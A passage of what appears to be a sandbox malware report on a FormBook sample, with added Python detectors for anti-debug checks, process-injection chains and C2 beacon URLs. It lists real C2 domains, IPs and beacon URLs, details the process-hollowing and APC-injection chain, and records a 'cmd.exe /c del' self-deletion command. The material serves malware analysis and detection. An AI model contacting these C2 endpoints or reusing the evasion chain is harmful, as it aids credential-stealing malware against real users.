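RM_INDEX = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "ebp": 5, "esi": 6, "edi": 7}

# Two encodings of "mov r32, fs:[disp32]":
#   64 A1 <disp32>           mov eax, fs:[disp32]   (moffs form, eax only)
#   64 8B <modrm> <disp32>   mov r32, fs:[disp32]   (ModRM form)
FS_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])(.{4})", re.DOTALL)


def scan_fs_loads(code: bytes, base: int = 0) -> list[dict]:
    """Return every fs:[disp32] load as {va, reg, disp, field, end}."""
    hits = []
    for m in FS_LOAD.finditer(code):
        off = m.start()
        reg = "eax" if code[off + 1] == 0xA1 else MODRM_DISP32[code[off + 2]]
        disp = struct.unpack("<I", m.group(1))[0]
        hits.append({"va": base + off, "reg": reg, "disp": disp,
                     "field": TEB_FIELDS.get(disp, "other"), "end": m.end()})
    return hits


def find_being_debugged_checks(code: bytes, base: int = 0, window: int = 16) -> list[int]:
    """VAs of PEB loads followed within `window` bytes by a read of [reg+2]:
    movzx r32, byte ptr [reg+2] (0F B6 /r) or cmp byte ptr [reg+2], 0 (80 /7)."""
    found = []
    for h in scan_fs_loads(code, base):
        if h["disp"] != 0x30 or h["reg"] not in RM_INDEX:
            continue
        rm = RM_INDEX[h["reg"]]
        movzx_any = {bytes([0x0F, 0xB6, 0x40 | (r << 3) | rm, 0x02]) for r in range(8)}
        cmp_zero = bytes([0x80, 0x78 | rm, 0x02, 0x00])
        tail = code[h["end"]: h["end"] + window]
        if cmp_zero in tail or any(p in tail for p in movzx_any):
            found.append(h["va"])
    return found


# Constructed anti-debug prologue (not from the report): load the PEB, test
# BeingDebugged, then load the PEB again to walk PEB.Ldr; the fs:[18h] load
# at the end is a TEB self-pointer read and must not count as a PEB access.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"              # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"     # mov eax, fs:[30h]             PEB
    "0F B6 40 02"           # movzx eax, byte ptr [eax+2]   PEB.BeingDebugged
    "85 C0 75 05"           # test eax, eax; jnz short
    "64 8B 0D 30 00 00 00"  # mov ecx, fs:[30h]             PEB
    "8B 49 0C"              # mov ecx, [ecx+0Ch]            PEB.Ldr
    "64 A1 18 00 00 00"     # mov eax, fs:[18h]             TEB.Self
    "5D C3"                 # pop ebp; ret
)
HYPOTHETICAL_BASE = 0x03220000  # assumed load address for the listing only

if __name__ == "__main__":
    for h in scan_fs_loads(SAMPLE_CODE, HYPOTHETICAL_BASE):
        print(f"{h['va']:08X}  mov {h['reg']}, fs:[{h['disp']:02X}h]  ({h['field']})")
    print("BeingDebugged checks at:",
          [f"{va:08X}" for va in find_being_debugged_checks(SAMPLE_CODE, HYPOTHETICAL_BASE)])
```

Run against a memory dump of the injected NETSTAT.EXE region, the first function alone reproduces the sandbox's "mov eax, dword ptr fs:[30h]" listing; the second narrows it to the loads that are actually followed by a BeingDebugged read, which is the subset worth a closer look in the disassembler.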

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 37.123.118.150:80
Source: C:\Windows\explorer.exe; Network Connect: 213.186.33.5:80
Source: C:\Windows\explorer.exe; Domain query: www.webartsolution.net
Source: C:\Windows\explorer.exe; Network Connect: 185.65.236.168:80
Source: C:\Windows\explorer.exe; Domain query: www.mcclureic.xyz
Source: C:\Windows\explorer.exe; Domain query: www.gadget198.xyz
Source: C:\Windows\explorer.exe; Domain query: www.intelldat.com
Source: C:\Windows\explorer.exe; Network Connect: 3.96.23.237:80
Source: C:\Windows\explorer.exe; Domain query: www.helpfromjames.com
Source: C:\Windows\explorer.exe; Network Connect: 172.67.158.42:80
Source: C:\Windows\explorer.exe; Domain query: www.le-hameau-enchanteur.com
Source: C:\Windows\explorer.exe; Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe; Network Connect: 198.54.125.56:80
Source: C:\Windows\explorer.exe; Network Connect: 151.139.128.11:80
Source: C:\Windows\explorer.exe; Domain query: www.yesrecompensas.lat
Source: C:\Windows\explorer.exe; Domain query: www.henleygirlscricket.com
Source: C:\Windows\explorer.exe; Network Connect: 143.95.80.65:80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: EA0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write (x2)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: unknown protection: read write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Memory written: C:\Users\user\Desktop\TT COPY_02101011.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Thread register set: target process: 3424
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: explorer.exe, 00000004.00000000.683168354.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.704124995.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.721487248.0000000000AD8000.00000004.00000020.sdmp; Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp; Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.709424798.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.729403220.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.692880282.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_10010DF5 cpuid
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
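Read together, the injection signatures above describe one chain: the sample rewrites a second instance of itself at 0x400000 (PE header `4D5A`), hollows NETSTAT.EXE (its original image is unmapped at EA0000, then an RWX section is mapped in), queues an APC and sets thread context in explorer.exe, after which explorer.exe, a system process, starts resolving and connecting to the C2 hosts and NETSTAT.EXE deletes the original file via `cmd.exe /c del`. The following Python is an added example, not part of the Joe Sandbox report: it correlates process events of that shape per source/target pair so the chain is reported as a whole and the network activity is attributed back to the injection target. The event stream is constructed to mirror the report's lines (the `pid:3424` target is the report's thread-context target PID); it is not a sandbox export, and the event kind names are this example's own.

```python
"""Correlate process events into injection / hollowing findings.

Added example, not part of the sandbox report. The EVENTS list is
constructed to mirror the report's signature sources; the event kind
names are this example's own normalisation, not a sandbox schema.
"""
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    source: str        # process performing the action
    target: str        # process acted upon ("" when not applicable)
    kind: str          # normalised event type
    detail: str = ""   # address, protection, command line, endpoint


SAMPLE = r"C:\Users\user\Desktop\TT COPY_02101011.exe"
NETSTAT = r"C:\Windows\SysWOW64\NETSTAT.EXE"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
SYSTEM_DIR = "c:\\windows\\"

# Constructed event stream modelled on the report; not a real export.
EVENTS = [
    Event(SAMPLE, SAMPLE, "memory_written", "base=0x400000 first_bytes=4D5A"),
    Event(SAMPLE, NETSTAT, "section_unmapped", "base=0xEA0000"),
    Event(SAMPLE, NETSTAT, "section_mapped", "protection=RWX"),
    Event(SAMPLE, EXPLORER, "section_mapped", "protection=RWX"),
    Event(SAMPLE, EXPLORER, "apc_queued"),
    Event(SAMPLE, "pid:3424", "thread_context_set"),
    Event(NETSTAT, EXPLORER, "section_mapped", "protection=RWX"),
    Event(NETSTAT, EXPLORER, "section_mapped", "protection=RW"),
    Event(NETSTAT, "pid:3424", "thread_context_set"),
    Event(NETSTAT, CMD, "process_created",
          r'/c del "C:\Users\user\Desktop\TT COPY_02101011.exe"'),
    Event(EXPLORER, "", "network_connect", "37.123.118.150:80"),
    Event(EXPLORER, "", "dns_query", "www.blttsperma.quest"),
]


def detect(events: list[Event]) -> list[tuple[str, str, str]]:
    """Return sorted (rule, source, target_or_detail) findings."""
    per_pair: dict[tuple[str, str], set[tuple[str, str]]] = defaultdict(set)
    for e in events:
        per_pair[(e.source, e.target)].add((e.kind, e.detail))
    chain = {e.source for e in events}   # images already part of the process chain
    findings: set[tuple[str, str, str]] = set()
    injected: set[str] = set()           # processes something was written into

    for (src, dst), evs in per_pair.items():
        kinds = {k for k, _ in evs}
        # Hollowing: the target's own image is unmapped, then code is mapped in.
        if "section_unmapped" in kinds and "section_mapped" in kinds:
            findings.add(("process_hollowing", src, dst)); injected.add(dst)
        # A full PE image (MZ header) written into a process, including a
        # second instance of the same executable created for that purpose.
        if any(k == "memory_written" and "4D5A" in d for k, d in evs):
            findings.add(("pe_image_written", src, dst)); injected.add(dst)
        if any(k == "section_mapped" and "RWX" in d for k, d in evs):
            findings.add(("rwx_section_mapped", src, dst)); injected.add(dst)
        if "apc_queued" in kinds:
            findings.add(("apc_injection", src, dst)); injected.add(dst)
        if "thread_context_set" in kinds:
            findings.add(("thread_hijack", src, dst)); injected.add(dst)
        # Self-deletion: cmd.exe spawned with "/c del" naming a chain member.
        if dst.lower().endswith("\\cmd.exe"):
            for k, d in evs:
                if k == "process_created" and "/c del" in d.lower() \
                        and any(img.lower() in d.lower() for img in chain):
                    findings.add(("self_delete_via_cmd", src, d))

    # Network activity is suspicious only when the system process doing it
    # was an injection target; that is what ties explorer.exe to the sample.
    for e in events:
        if e.kind in ("network_connect", "dns_query") and e.source in injected \
                and e.source.lower().startswith(SYSTEM_DIR):
            findings.add(("injected_system_process_network", e.source, e.detail))
    return sorted(findings)


if __name__ == "__main__":
    for rule, src, tgt in detect(EVENTS):
        print(f"{rule:32} {src} -> {tgt}")
```

The design choice worth copying is the last loop: a network connection from explorer.exe is unremarkable on its own, and a thread-context change on its own is a weak signal; joining them through the `injected` set is what turns the report's separate "system process connects to network" and "modifies the context of a thread" lines into a single attributable finding.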

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; the same eleven unpacked PE files and twelve memory dumps listed under "Stealing of Sensitive Information" above (the FormBook rule fires in both categories).

Mitre Att&ck Matrix

Techniques per tactic, in the order of the original matrix; the bracketed digits are the matrix's signature-hit badges as shown on the original page.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API [1]; Shared Modules [1]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion [2]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [1]; File Deletion [1]; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [251]; Virtualization/Sandbox Evasion [2]; Process Discovery [2]; Remote System Discovery [1]; System Network Configuration Discovery [1]; System Network Connections Discovery [1]; File and Directory Discovery [2]; System Information Discovery [113]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data [1]; Clipboard Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 528714; Sample: TT COPY_02101011.exe; Start date: 25/11/2021; Architecture: WINDOWS; Score: 100

Start (sample submission)
  DNS/IP: www.helpfromjames.com; www.dandftrading.com; 4 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
  -> started: TT COPY_02101011.exe 17

TT COPY_02101011.exe 17 (first instance)
  Dropped file: C:\Users\user\AppData\...\wdtzbwxasut.dll, PE32
  Signatures: Injects a PE file into a foreign process
  -> started: TT COPY_02101011.exe (second instance)

TT COPY_02101011.exe (second instance)
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
  -> injected: explorer.exe

explorer.exe (injected)
  DNS/IP: www.blttsperma.quest 37.123.118.150, 49820, 80, UK2NET-ASGB, United Kingdom; www.le-hameau-enchanteur.com 213.186.33.5, 49784, 80, OVHFR, France; 11 other IPs or domains
  Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Uses netstat to query active network connections and open ports
  -> started: NETSTAT.EXE; autoconv.exe

NETSTAT.EXE
  Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  -> started: cmd.exe 1

cmd.exe 1
  -> started: conhost.exe

Screenshots

(screenshot thumbnails of the Windows desktop during execution; not reproduced in this text export)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
TT COPY_02101011.exe | 36% | Virustotal |
TT COPY_02101011.exe | 16% | ReversingLabs | Win32.Trojan.Nemesis

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll | 16% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
1.0.TT COPY_02101011.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.TT COPY_02101011.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.TT COPY_02101011.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.TT COPY_02101011.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
0.2.TT COPY_02101011.exe.2a30000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.NETSTAT.EXE.372796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.TT COPY_02101011.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.NETSTAT.EXE.d6e840.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.TT COPY_02101011.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
www.le-hameau-enchanteur.com | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
www.helpfromjames.com/e8ia/ | 0% | Avira URL Cloud | safe
http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe
http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe
http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe
http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe
http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe
http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe
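Every URL in the table above has the same shape: a different host, the same path `/e8ia/`, a query with the same two parameter names in the same order, a per-beacon value in the first parameter and the constant `5jvdevo8uz` in the second. That structure, not any single host, is the durable indicator, since the hosts are a rotating decoy list and the URL-reputation verdicts above are all "safe". The following Python is an added example, not part of the Joe Sandbox report: it parses the URLs copied from the table, checks that they share one path and query layout, separates the variable parameter from the constant one, and compiles the result into a regex that matches further beacons to the same campaign on any host. The `www.example.invalid` host in the test is a constructed placeholder.

```python
"""Derive a host-independent beacon signature from the listed C2 URLs.

Added example, not part of the sandbox report. C2_URLS is copied from the
report; no claim is made about how the per-beacon value is produced.
"""
from __future__ import annotations
import re
from urllib.parse import urlsplit

C2_URLS = [
    "www.helpfromjames.com/e8ia/",
    "http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz",
    "http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz",
    "http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz",
    "http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz",
    "http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz",
    "http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz",
]


def split_query(query: str) -> list[tuple[str, str]]:
    """Split a query string without decoding: parse_qsl would turn the '+'
    characters inside the beacon value into spaces."""
    if not query:
        return []
    return [tuple(item.partition("=")[::2]) for item in query.split("&")]


def decompose(url: str) -> dict:
    if "://" not in url:
        url = "http://" + url          # bare host/path entries lack a scheme
    u = urlsplit(url)
    return {"host": u.hostname, "path": u.path, "params": split_query(u.query)}


def campaign_signature(urls: list[str]) -> dict:
    """Common path, ordered parameter names, and parameters whose value never
    changes across beacons (those are campaign constants)."""
    parts = [decompose(u) for u in urls]
    paths = {p["path"] for p in parts}
    if len(paths) != 1:
        raise ValueError(f"more than one path: {sorted(paths)}")
    with_query = [p for p in parts if p["params"]]
    key_orders = {tuple(k for k, _ in p["params"]) for p in with_query}
    if len(key_orders) != 1:
        raise ValueError(f"inconsistent query layout: {sorted(key_orders)}")
    keys = list(key_orders.pop())
    constants = {}
    for i, k in enumerate(keys):
        values = {p["params"][i][1] for p in with_query}
        if len(values) == 1:
            constants[k] = values.pop()
    return {"path": paths.pop(), "param_keys": keys, "constants": constants,
            "hosts": sorted({p["host"] for p in parts})}


def build_regex(sig: dict) -> re.Pattern:
    """Any host, the fixed path, constant parameters literal, the others opaque."""
    query = "&".join(
        re.escape(k) + "=" + (re.escape(sig["constants"][k])
                              if k in sig["constants"] else r"[A-Za-z0-9+/=]+")
        for k in sig["param_keys"])
    return re.compile(r"^https?://[^/]+" + re.escape(sig["path"]) + r"\?" + query + r"$")


def is_c2_beacon(url: str, sig: dict) -> bool:
    return build_regex(sig).match(url) is not None


if __name__ == "__main__":
    sig = campaign_signature(C2_URLS)
    print("path:", sig["path"], "params:", sig["param_keys"], "constants:", sig["constants"])
    print("hosts:", ", ".join(sig["hosts"]))
    print("regex:", build_regex(sig).pattern)
```

The bare `www.helpfromjames.com/e8ia/` entry contributes only its host and path; the regex requires the full query, so a proxy-log match needs the parameters. Pair the regex with the host list: the regex catches beacons to hosts not yet seen, while the host list catches the decoy domains, which serve legitimate content and would otherwise pass reputation checks, as the 0% verdicts above show.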

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.le-hameau-enchanteur.com | 213.186.33.5 | true | true | | unknown
www.blttsperma.quest | 37.123.118.150 | true | true | | unknown
www.bestinvest-4-you.com | 104.21.31.204 | true | true | | unknown
helpfromjames.com | 185.65.236.168 | true | true | | unknown
webartsolution.net | 198.54.125.56 | true | true | | unknown
www.yesrecompensas.lat | 3.96.23.237 | true | true | | unknown
www.gadget198.xyz | 172.67.158.42 | true | true | | unknown
w2y6q8s9.stackpathcdn.com | 151.139.128.11 | true | true | | unknown
intelldat.com | 143.95.80.65 | true | true | | unknown
wss.easycompanies.com.au | 13.210.99.21 | true | false | | unknown
www.weprepareamerica-planet.com | 208.91.197.27 | true | false | | unknown
www.webartsolution.net | unknown | unknown | true | | unknown
www.mcclureic.xyz | unknown | unknown | true | | unknown
www.henleygirlscricket.com | unknown | unknown | true | | unknown
www.intelldat.com | unknown | unknown | true | | unknown
www.dandftrading.com | unknown | unknown | true | | unknown
www.helpfromjames.com | unknown | unknown | true | | unknown

                                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.helpfromjames.com/e8ia/ | true | Avira URL Cloud: safe | low
http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown
http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown
http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown
http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown
http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown
http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown

                                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | TT COPY_02101011.exe | false | | high
